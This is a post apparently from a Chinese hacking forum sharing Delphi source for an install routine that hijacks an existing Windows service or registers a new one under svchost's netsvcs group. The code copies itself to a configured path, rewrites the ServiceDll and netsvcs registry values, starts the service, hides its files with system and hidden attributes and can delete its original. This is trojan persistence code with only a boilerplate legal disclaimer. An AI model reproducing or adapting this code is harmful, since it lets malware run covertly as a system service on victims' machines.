HanDs
NO.2

[Delphi文章] 替换和安装新svchost服务 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

procedure Install(var DelMe:Boolean );stdcall ;  
var 
FileName: array[0..255] of Char;  
reg:TRegistry;  
hSCM,hSCS: Cardinal ;  
ss : TServiceStatus;  
Args : PChar;  
s,s1:string;  
begin 
 
FillChar(FileName,SizeOf(FileName),0);  
GetModuleFileName(HInstance, FileName, SizeOf(FileName));  
s := Config.DIR+config.FileName;  
reg := TRegistry.Create;  
reg.RootKey := HKEY_LOCAL_MACHINE ;  
hSCM := OpenSCManager(nil,Nil,SC_MANAGER_ALL_ACCESS);  
if hSCM = 0 then Exit ;  
case Config.StartupMode of 
RunAsServiceD : //'s':现存服务启动  
    begin 
      hSCS := OpenService(hSCM ,PChar(string(config.SrvName)), SERVICE_ALL_ACCESS);  
      if hSCS <> 0 then 
      begin 
        ControlService(hSCS ,SERVICE_CONTROL_STOP,ss);  
        ChangeServiceConfig(hSCS,  
                         SERVICE_WIN32_OWN_PROCESS or SERVICE_INTERACTIVE_PROCESS,  
                         SERVICE_AUTO_START,  
                         SERVICE_NO_CHANGE,  
                         nil,nil,nil,nil,nil,nil,nil);  
        if lstrcmpi(FileName,PChar(s)) <> 0 then 
        begin 
          Setfileattributes(PChar(s),FILE_ATTRIBUTE_NORMAL );  
          CopyFile(FileName, PChar(s),False) ; //copy到指定文件夹  
        end;  
        reg.OpenKey('SYSTEM\CurrentControlSet\Services\'+config.SrvName+'\',True) ;  
        SetPrivilege('SeBackupPrivilege');  
        RegSaveKey(reg.CurrentKey ,PChar(s+'.uns'),nil);  
        SetPrivilege('SeBackupPrivilege',False );  
        reg.CloseKey;  
        reg.OpenKey('SYSTEM\CurrentControlSet\Services\'+config.SrvName+  
          '\Parameters\',True) ;  
        reg.WriteData('ServiceDll',s[1],Length(s),REG_EXPAND_SZ );  
        StartService(hSCS , 0, Args);  
        CloseServiceHandle(hSCS);  
      end;  
    end;  
RunAsService : //新建服务启动  
    begin 
      InstallService(Config.SrvName,  
                     Config.DisplayName,  
                     '%SystemRoot%\System32\svchost.exe -k netsvcs',  
                     Config.Description); //安装服务  
      if lstrcmpi(FileName,PChar(s)) <> 0 then 
      begin 
        Setfileattributes(PChar(s),FILE_ATTRIBUTE_NORMAL );  
        CopyFile(FileName, PChar(s),False) ; //copy到指定文件夹  
      end;  
 
      reg.OpenKey('SYSTEM\CurrentControlSet\Services\'+config.SrvName+  
        '\Parameters\',True) ;  
      reg.WriteData('ServiceDll',s[1],Length(s),REG_EXPAND_SZ );  
      reg.CloseKey;  
      reg.OpenKey('SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost',False );  
      SetPrivilege('SeBackupPrivilege');  
      RegSaveKey(reg.CurrentKey ,PChar(s+'.uns'),nil);  
      SetPrivilege('SeBackupPrivilege',False );  
      s1 := reg.ReadString('netsvcs');  
      s1 := config.SrvName+#0+s1;  
      reg.WriteData('netsvcs',s1[1],Length(s1),REG_MULTI_SZ );  
      hSCS := OpenService(hSCM ,PChar(string(config.SrvName)), SERVICE_ALL_ACCESS);  
      if hSCS <> 0 then 
      begin 
        StartService(hSCS , 0, Args);  
        CloseServiceHandle(hSCS);  
      end;  
    end;  
end;  
CloseServiceHandle(hSCM);  
reg.CloseKey ;  
reg.Free;  
Setfileattributes(PChar(s),FILE_ATTRIBUTE_SYSTEM+FILE_ATTRIBUTE_HIDDEN);  
Setfileattributes(PChar(s+'.uns'),FILE_ATTRIBUTE_SYSTEM+  
        FILE_ATTRIBUTE_HIDDEN);  
DelMe := Config.RMwIns;  
end; 


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
替换
#1楼
发帖时间:2016-7-9   |   查看数:0   |   回复数:0
游客组